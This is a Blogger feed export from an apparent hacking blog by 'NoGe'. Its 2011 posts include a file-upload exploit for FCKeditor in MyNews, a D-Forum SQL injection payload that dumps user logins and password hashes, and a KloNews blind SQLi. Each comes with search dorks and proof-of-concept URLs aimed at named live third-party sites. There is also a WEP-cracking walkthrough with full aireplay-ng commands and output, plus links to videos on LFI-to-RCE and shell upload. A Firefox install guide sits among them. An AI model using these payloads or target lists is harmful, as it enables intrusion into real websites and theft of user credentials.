NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;FCKeditor/editor/filemanager/upload/php/config.php&lt;br /&gt;&lt;br /&gt;// SECURITY: You must explicitelly enable this "uploader". &lt;br /&gt;&lt;br /&gt;$Config['Enabled'] = true ;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;in the "File Uploader" section, select "PHP"&lt;br /&gt;browse file u want to upload and click "Send it to the Server"&lt;br /&gt;if the file uploaded with no error, u will see the file path in "Uploaded File URL"&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/files/your_file.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html&lt;br /&gt;http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7787938048061276732?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7787938048061276732/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7787938048061276732' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7787938048061276732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7787938048061276732'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/mynews-arbitrary-file-upload-vuln.html' title='MyNews Arbitrary File Upload Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2727969098579316790</id><published>2011-07-16T11:13:00.008+07:00</published><updated>2011-07-16T11:38:05.862+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Install firefox 5 in ubuntu</title><content type='html'>&lt;span style="font-weight:bold;"&gt;What’s new in Firefox 5 RC :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Added support for CSS animations&lt;br /&gt;The Do-Not-Track header preference has been moved to increase discoverability&lt;br /&gt;Improved canvas, JavaScript, memory, and networking performance&lt;br /&gt;Improved standards support for HTML5, XHR, MathML, SMIL, and canvas&lt;br /&gt;Improved spell checking for some locales&lt;br /&gt;Improved desktop environment integration for Linux users&lt;br /&gt;WebGL content can no longer load cross-domain textures&lt;br /&gt;Background tabs have setTimeout and setInterval clamped to 1000ms to improve performance&lt;br /&gt;The Firefox development channel switcher introduced in previous Firefox Beta updates has been removed&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;System Requirements&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Linux&lt;br /&gt;Software Requirements&lt;br /&gt;Please note that Linux distributors may provide packages for your distribution which have different requirements.&lt;br /&gt;&lt;br /&gt;Firefox will not run at all without the following libraries or packages:&lt;br /&gt;GTK+ 2.10 or higher&lt;br /&gt;GLib 2.12 or higher&lt;br /&gt;Pango 1.14 or higher&lt;br /&gt;X.Org 1.0 or higher (1.7 or higher is recommended)&lt;br /&gt;libstdc++ 4.3 or higher&lt;br /&gt;&lt;br /&gt;For optimal functionality, we recommend the following libraries or packages:&lt;br /&gt;NetworkManager 0.7 or higher&lt;br /&gt;DBus 1.0 or higher&lt;br /&gt;HAL 0.5.8 or higher&lt;br /&gt;GNOME 2.16 or higher&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Installing Firefox 5&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Open terminal&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Application &gt;&gt; Accessories &gt;&gt; Terminal&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;sudo add-apt-repository ppa:mozillateam/firefox-stable&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-vWLlOPAFlCQ/TiESbelqYUI/AAAAAAAAAG8/SvpQIgnuEuM/s1600/1.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 68px;" src="http://3.bp.blogspot.com/-vWLlOPAFlCQ/TiESbelqYUI/AAAAAAAAAG8/SvpQIgnuEuM/s320/1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5629801272466628930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;sudo apt-get update&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-xu1jSEX6RBc/TiESnBbufYI/AAAAAAAAAHE/Pxstk0iQaFc/s1600/2.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 102px;" src="http://2.bp.blogspot.com/-xu1jSEX6RBc/TiESnBbufYI/AAAAAAAAAHE/Pxstk0iQaFc/s320/2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5629801470798757250" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;sudo apt-get upgrade&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-6i-zqAsttec/TiESxyOCDoI/AAAAAAAAAHM/sLCmQzv2Ugg/s1600/3.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 69px;" src="http://1.bp.blogspot.com/-6i-zqAsttec/TiESxyOCDoI/AAAAAAAAAHM/sLCmQzv2Ugg/s320/3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5629801655693348482" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;firefox 5 installed&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-dQr7hNi5FB4/TiETCEvIK6I/AAAAAAAAAHU/vQKzgFidLOw/s1600/4.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 206px;" src="http://4.bp.blogspot.com/-dQr7hNi5FB4/TiETCEvIK6I/AAAAAAAAAHU/vQKzgFidLOw/s320/4.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5629801935541906338" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2727969098579316790?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2727969098579316790/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2727969098579316790' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2727969098579316790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2727969098579316790'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/install-firefox-5-in-ubuntu.html' title='Install firefox 5 in ubuntu'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-vWLlOPAFlCQ/TiESbelqYUI/AAAAAAAAAG8/SvpQIgnuEuM/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6233853224199623084</id><published>2011-07-13T01:00:00.005+07:00</published><updated>2011-07-16T23:32:50.883+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>video reupload</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] php://input injection&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;watch&lt;br /&gt;http://pacenoge.info/video/php_input.html&lt;br /&gt;download&lt;br /&gt;http://pacenoge.info/video/php_input.swf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] e107 Code Exec&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;watch&lt;br /&gt;http://pacenoge.info/video/e107.html&lt;br /&gt;download&lt;br /&gt;http://pacenoge.info/video/e107.swf&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PHP shell upload via LFI vuln&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;watch&lt;br /&gt;http://pacenoge.info/video/lfi.html&lt;br /&gt;download&lt;br /&gt;http://pacenoge.info/video/lfi.swf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] LFI to RCE&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;watch&lt;br /&gt;http://pacenoge.info/video/lfi2rce.html&lt;br /&gt;download&lt;br /&gt;http://pacenoge.info/video/lfi2rce.swf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] LFI local upload form&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;watch&lt;br /&gt;http://pacenoge.info/video/upload_form.html&lt;br /&gt;download&lt;br /&gt;http://pacenoge.info/video/upload_form.swf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Remote Command Execute @ CGI Script&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;watch&lt;br /&gt;http://pacenoge.info/video/rce_cgi.html&lt;br /&gt;download&lt;br /&gt;http://pacenoge.info/video/rce_cgi.swf&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6233853224199623084?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6233853224199623084/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6233853224199623084' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6233853224199623084'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6233853224199623084'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/video-reupload.html' title='video reupload'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3167083080345373026</id><published>2011-07-12T11:34:00.003+07:00</published><updated>2011-07-12T11:49:21.545+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>D-Forum 1.11 SQL Injection Vulnerability</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] D-Forum 1.11 SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : D-Forum version 1.11 [previous version affected too]&lt;br /&gt;Vendor : http://www.adalis.fr/dforum&lt;br /&gt;Author : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/nav.php3?page=voirsujet&amp;boardid=1&amp;postid=[SQLi]&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;"Powered by D-forum"&lt;br /&gt;"nav.php3?page=voirsujet"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://www.enesm.com/forum/nav.php3?page=voirsujet&amp;boardid=x&amp;postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--&lt;br /&gt;http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&amp;boardid=x&amp;postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3167083080345373026?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3167083080345373026/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3167083080345373026' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3167083080345373026'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3167083080345373026'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/d-forum-111-sql-injection-vulnerability.html' title='D-Forum 1.11 SQL Injection Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6374942373800167690</id><published>2011-07-12T11:11:00.004+07:00</published><updated>2011-07-12T11:24:44.408+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>KloNews 2.0 Blind SQLi Vulnerability</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] KloNews 2.0 Blind SQLi Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : KloNews 2.0&lt;br /&gt;Vendor : http://www.kloweb.net/&lt;br /&gt;Author : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5 &lt;&lt; True&lt;br /&gt;http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4 &lt;&lt; False&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;"Propulsé par KloNews"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5&lt;br /&gt;http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6374942373800167690?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6374942373800167690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6374942373800167690' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6374942373800167690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6374942373800167690'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/klonews-20-blind-sqli-xss-vulnerability.html' title='KloNews 2.0 Blind SQLi Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6121067413093131496</id><published>2011-07-06T12:49:00.002+07:00</published><updated>2011-07-06T12:52:50.893+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>fragmentation attack with aireplay-ng</title><content type='html'>basically, the program obtains a small amount of keying material from the packet&lt;br /&gt;then attempts to send ARP and/or LLC packets with known content to the access point.&lt;br /&gt;if the packet is successfully echoed back by the access point then a larger amount&lt;br /&gt;of keying information can be obtained from the returned packet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;scenario&lt;br /&gt;&lt;br /&gt;ESSID : wireless&lt;br /&gt;BSSID : 00:02:6F:23:2B:67&lt;br /&gt;CLIENT MAC : 00:02:4G:87:22:FG&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;[o] u need to authenticate with the access point.&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0&lt;br /&gt;The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).&lt;br /&gt; ifconfig mon0 hw ether 00:02:4G:87:22:FG&lt;br /&gt;09:58:55  Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10&lt;br /&gt;&lt;br /&gt;09:58:55  Sending Authentication Request (Open System)&lt;br /&gt;09:58:55  Authentication successful&lt;br /&gt;09:58:55  Sending Association Request&lt;br /&gt;09:58:55  Association successful :-) (AID: 1)&lt;br /&gt;&lt;br /&gt;09:59:10  Sending keep-alive packet&lt;br /&gt;09:59:25  Sending keep-alive packet&lt;br /&gt;09:59:40  Sending keep-alive packet&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] run standard ARP request replay&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0&lt;br /&gt;For information, no action required: Using gettimeofday() instead of /dev/rtc&lt;br /&gt;The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).&lt;br /&gt; ifconfig mon0 hw ether 00:02:4G:87:22:FG&lt;br /&gt;08:07:58  Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10&lt;br /&gt;Saving ARP requests in replay_arp-0706-080758.cap&lt;br /&gt;You should also start airodump-ng to capture replies.&lt;br /&gt;728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)&lt;br /&gt;&lt;br /&gt;as u can see i got 0 ARP request&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] fragmentation attack!&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0&lt;br /&gt;For information, no action required: Using gettimeofday() instead of /dev/rtc&lt;br /&gt;The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).&lt;br /&gt; ifconfig mon0 hw ether 00:02:4G:87:22:FG&lt;br /&gt;09:59:00  Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10&lt;br /&gt;09:59:00  Waiting for a data packet...&lt;br /&gt;Read 432 packets...&lt;br /&gt;&lt;br /&gt;        Size: 112, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;&lt;br /&gt;              BSSID  =  00:02:6F:23:2B:67&lt;br /&gt;          Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;         Source MAC  =  00:02:4G:87:22:FG&lt;br /&gt;&lt;br /&gt;        0x0000:  0842 2c00 0002 6f87 11fe 0002 6f55 2bd2  .B,...o.....oU+.&lt;br /&gt;        0x0010:  000c 4252 2553 e05c 1398 2200 e7b4 f9fa  ..BR%S.\..".....&lt;br /&gt;        0x0020:  a786 d686 bfd1 8151 5bcf a8cb eac8 a10a  .......Q[.......&lt;br /&gt;        0x0030:  52a9 49c5 ade4 de32 ef4b 294e c961 7de0  R.I....2.K)N.a}.&lt;br /&gt;        0x0040:  95ce afe7 ae32 225e 3af0 73db e7aa 47e4  .....2"^:.s...G.&lt;br /&gt;        0x0050:  6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e  `S.L...[........&lt;br /&gt;        0x0060:  82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520  ....1.....Nw... &lt;br /&gt;&lt;br /&gt;Use this packet ? y&lt;br /&gt;&lt;br /&gt;Saving chosen packet in replay_src-0706-095931.cap&lt;br /&gt;09:59:34  Data packet found!&lt;br /&gt;09:59:34  Sending fragmented packet&lt;br /&gt;09:59:34  Got RELAYED packet!!&lt;br /&gt;09:59:34  Trying to get 384 bytes of a keystream&lt;br /&gt;09:59:35  No answer, repeating...&lt;br /&gt;09:59:35  Trying to get 384 bytes of a keystream&lt;br /&gt;09:59:35  Trying a LLC NULL packet&lt;br /&gt;09:59:37  No answer, repeating...&lt;br /&gt;09:59:37  Trying to get 384 bytes of a keystream&lt;br /&gt;09:59:39  No answer, repeating...&lt;br /&gt;09:59:39  Trying to get 384 bytes of a keystream&lt;br /&gt;09:59:39  Trying a LLC NULL packet&lt;br /&gt;09:59:39  Got RELAYED packet!!&lt;br /&gt;09:59:39  Trying to get 1500 bytes of a keystream&lt;br /&gt;09:59:39  Got RELAYED packet!!&lt;br /&gt;Saving keystream in fragment-0706-095939.xor&lt;br /&gt;Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] build u'r packet with packetforge-ng&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx &lt;br /&gt;Wrote packet to: privx&lt;br /&gt;&lt;br /&gt;[o] use privx to capture ARP request&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0&lt;br /&gt;For information, no action required: Using gettimeofday() instead of /dev/rtc&lt;br /&gt;The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).&lt;br /&gt; ifconfig mon0 hw ether 00:02:4G:87:22:FG&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;        Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;&lt;br /&gt;              BSSID  =  00:02:6F:23:2B:67&lt;br /&gt;          Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;         Source MAC  =  00:02:4G:87:22:FG&lt;br /&gt;&lt;br /&gt;        0x0000:  0841 0201 0002 6f55 2bd2 0002 6f87 11fe  .A....oU+...o...&lt;br /&gt;        0x0010:  ffff ffff ffff 8001 3e98 2200 3a8c be0b  ........&gt;.".:...&lt;br /&gt;        0x0020:  0926 44f8 fe6a c35c d517 3ff1 2a8b 95df  .&amp;D..j.\..?.*...&lt;br /&gt;        0x0030:  97eb b45d bab9 b71b e777 edc7 8678 f1e7  ...].....w...x..&lt;br /&gt;        0x0040:  d1b2 68b7                                ..h.&lt;br /&gt;&lt;br /&gt;Use this packet ? y&lt;br /&gt;&lt;br /&gt;Saving chosen packet in replay_src-0706-100037.cap&lt;br /&gt;You should also start airodump-ng to capture replies.&lt;br /&gt;&lt;br /&gt;Sent 37888 packets...(150 pps)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] ARP request start to showing some result [check standard ARP request replay]&lt;br /&gt;&lt;br /&gt;422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] run airodump-ng to capture replies&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0&lt;br /&gt;CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19                                         &lt;br /&gt;                                                                                                                            &lt;br /&gt; BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;                                                                                                                            &lt;br /&gt; 00:02:6F:23:2B:67  -75  90    11337   100296   89  10  54 . WEP  WEP    OPN  wireless&lt;br /&gt;&lt;br /&gt; BSSID              STATION            PWR   Rate    Lost  Packets Probes&lt;br /&gt;&lt;br /&gt; 00:02:6F:23:2B:67  00:02:4G:87:22:FG    0   36 - 1   1271   216477&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] crack u'r .cap file to find the key!&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6121067413093131496?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6121067413093131496/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6121067413093131496' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6121067413093131496'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6121067413093131496'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/fragmentation-attack-with-aireplay-ng.html' title='fragmentation attack with aireplay-ng'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8220167865173302483</id><published>2011-07-05T13:07:00.006+07:00</published><updated>2011-07-06T11:31:13.733+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>WEP key problem [SOLVED]</title><content type='html'>my machine&lt;br /&gt;ubuntu 9.10&lt;br /&gt;linksys wusb54g ver 4&lt;br /&gt;chipset ralink 2570&lt;br /&gt;aircrack-ng 1.1&lt;br /&gt;&lt;br /&gt;i have a problem with WEP key..&lt;br /&gt;after i crack IVS with aircrack-ng, key found! but can't connect to access point.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-VbgVzctF-jA/ThKqg8YVwgI/AAAAAAAAAGE/vcYdK8r1BhM/s1600/key.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 221px;" src="http://1.bp.blogspot.com/-VbgVzctF-jA/ThKqg8YVwgI/AAAAAAAAAGE/vcYdK8r1BhM/s320/key.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5625746367479923202" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;the access point keep ask me for the WEP key.&lt;br /&gt;the key is correct! what's wrong then?&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-4XgIMc0Sp3s/ThKrEHLN6pI/AAAAAAAAAGM/RKZdG2-NyKU/s1600/diskonek.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 88px;" src="http://2.bp.blogspot.com/-4XgIMc0Sp3s/ThKrEHLN6pI/AAAAAAAAAGM/RKZdG2-NyKU/s320/diskonek.png" border="0" 